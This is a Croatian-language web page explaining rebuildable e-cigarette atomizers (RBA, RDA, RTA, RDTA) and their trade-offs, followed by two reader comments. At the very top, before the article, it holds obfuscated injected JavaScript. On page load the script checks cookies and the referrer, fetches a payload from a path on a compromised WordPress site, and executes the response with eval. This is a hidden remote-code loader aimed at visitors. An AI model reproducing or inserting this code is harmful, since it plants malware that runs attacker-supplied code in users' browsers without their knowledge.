;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vodič za rebuildable atomizere: RBA vs RDA vs RTA vs RDTA

Kada je u pitanju svijet atomizera za e-cigarete, dostupni su brojni oblici, veličine i vrste. I iako početniku na prvu mogu se mogu činiti vrlo kompliciranim, atomizeru su zapravo vrlo laki za razumijevanje.

Postoji nekoliko skraćenica s kojima ćete se često susresti ukoliko tražite atomizer za koji možete sami izrađivati svoje grijače (dakle, danas ne govorimo o atomizerima s kupovnim grijačima).

Sve počinje slovom “R”, što znači “Rebuildable”. Općenito, svaka vrsta atomizera na kojem možete izgraditi vlastite zavojnice naziva se RBA (Rebuildable Atomizer). Atomizer je jednostavno spremnik koji, kada kroz njega prođe struja, isparava tekućinu i stvara paru.

U ovom vodiču objasnit ćemo različite vrste atomizera kao i razlike između njih.

Što je RBA?

RBA je skraćenica od ReBuildable Atomizer, a odnosi se na bilo koju vrstu spremnika na kojem možete izgraditi vlastite zavojnice i fitilje. RDA, RTA i RDTA su različite vrste RBA.

S RBA-ima ćete morati fizički zamotati svoju žicu i provući vlastiti pamuk. Za razliku od zavojnica koje se kupuju u trgovini, izrada vlastitih zavojnica zahtijeva malo tehničkog znanja i vještine. Međutim, vrlo je lako naviknuti se na izgradnju, a može biti i zabavno!

Korištenje RBA omogućuje vam da izgradite svoje zavojnice sa željenim otporom, a to znači veću kontrolu nad vašim iskustvom vapinga. Izrada vlastitih zavojnica također je puno jeftinija od kupnje gotovih grijača.

Što je RDA?

RDA je skraćenica od Rebuildable Dripping Atomizer, i to je RBA u kojem se nalazi build-deck i jedan ili više stupova. Ovi stupovi se koriste za osiguranje vaših zavojnica, a neki RDA mogu smjestiti čak i tri ili više zavojnica odjednom (iako se RBA atomizeri najčešće koriste s jednom do dvije zavojnice). Postoji središnji poklopac koji okružuje i prekriva sklop za izradu, s gornjim poklopcem koji ide na vrh.

RDA nemaju stakleni spremnik za držanje tekućine. Umjesto toga, RDA su namijenjeni za korištenje kapanjem tekućine izravno na vatu (obično nakon uklanjanja gornjeg poklopca). Većina RDA ima udubljenje ispod zavojnica koji će omogućiti sakupljanje malo soka, ali obično je vrlo malo (oko 1ml).

Zbog neposredne blizine zavojnica vašim ustima, RDA proizvode vrlo koncentriranu i aromatičnu paru. Također možete slobodnije mijenjati okuse. Nedostatak je taj što ćete morati dokapavati tekućinu svakih nekoliko izvlačenja kako biste spriječili suha povlačenja. Danas, međutim, mnogi RDA korisnici koriste squonk modove koji vam omogućuju da stiskanjem boce vlažite vatu dok parite.

Za okus i ogromne oblake pare, RDA važe kao generalno najbolji izbor.

Što je RTA?

RTA je skraćenica od Rebuildable Tank Atomizer, i to je RBA u kojem se nalazi sklop za izgradnju s jednim ili više stupova za osiguranje vaših zavojnica. Build deck na koji montirate zavojnicu je ograđen metalnim dimnjakom s kupolom koji usmjerava paru na usnik.

Stakleni spremnik brtvi i okružuje dimnjak, a vi možete napuniti ovaj stakleni spremnik e-tekućinom. Na dnu dimnjaka nalaze se mali izrezi koji omogućavaju tekućini da konstantno natapa vatu provučenu kroz zavojnice gdje on zatim isparava. RTA funkcionira vrlo slično klasičnim atomizerima s gotovim grijačima koje možete kupiti, samo bez unaprijed izrađenih zavojnica.

Glavna razlika između RDA i RTA je u tome što RTA ima spremnik za držanje tekućine, dok RDA nema. Uz RTA, nema potrebe za konstantnim kapanjem; većina RTA ima kapacitet od 3 ml+. Nedostatak je što okus iz RTA-a nije tako pun kao što biste dobili od RDA, ali većina vapera ipak odabere žrtvovati to malo arome zarad praktičnosti.

Što je RDTA?

RDTA je skraćenica od Rebuildable Dripping Tank Atomizer i to je RBA sa značajkama RDA i RTA. RDTA ima build deck s jednim ili više stupova za osiguranje vaših zavojnica, a također ima srednji poklopac koji okružuje i pokriva ga. Ispod decka je spremnik koji se može napuniti e-tekućinom. Na dnu build decka postoje rupe koje omogućuju ubacivanje vate koja se zatim natapa od dole. Također možete kapati ejuice izravno na svoje zavojnice.

RDTA su izmišljeni kako bi spojili poboljšani okus RDA i praktičnost RTA. Ali stvarnost je da RDTA mogu biti teški za korištenje i, zbog svog dizajna, skloni su curenju.

Iako se RDTA oglašavaju kao bolji od RTA-a, to će stvarno ovisiti o vašim osobnim preferencijama.

Koji je atomizer najbolji izbor za vas?

Ne znate koju vrstu RBA odabrati? Evo nekoliko stvari koje treba uzeti u obzir:

Ako tražite najbolji okus i nemate ništa protiv kapanja ili korištenja squonk moda, trebali biste si nabaviti RDA.

Ako tražite praktičnost, RTA će vam omogućiti da napunite spremnik bez brige o kapanju. Nećete dobiti toliko okusa kao što biste dobili od RDA, ali ukoliko koristite donekle kvalitetan RTA, aroma bi i dalje trebala biti dovoljno dobra zadovoljavajuća za svakog prosječnog do naprednog korisnika.

Ako želite mješavinu oba svijeta, RDTA će vam ponuditi praktičnost spremnika koji se može ponovno puniti, s mogućnošću kapanja. RDTA je malo teže konfigurirati od RTA ili RDA.

Choose your Reaction!
  • Odlično objašnjeno. Ipak, za mene osobno još uvijek su jedino RTA atomizeri zanimljivi. Isprobao sam Hellvape Dead Rabbit v2 RDA i nismo si “kliknuli”.
    Tako da je isti proslijeđen frendu koji ga sad koristi i njemu je to ok, a ja sam na 3 MTL RTA atomizera i to mi je sasvim dovoljno:)

  • Odlično ali ja bi umjesto termina “stupovi” koristio “postovi” lakše će tražilica pronaći traženi pojam prilikom web kupnje.

Leave a Comment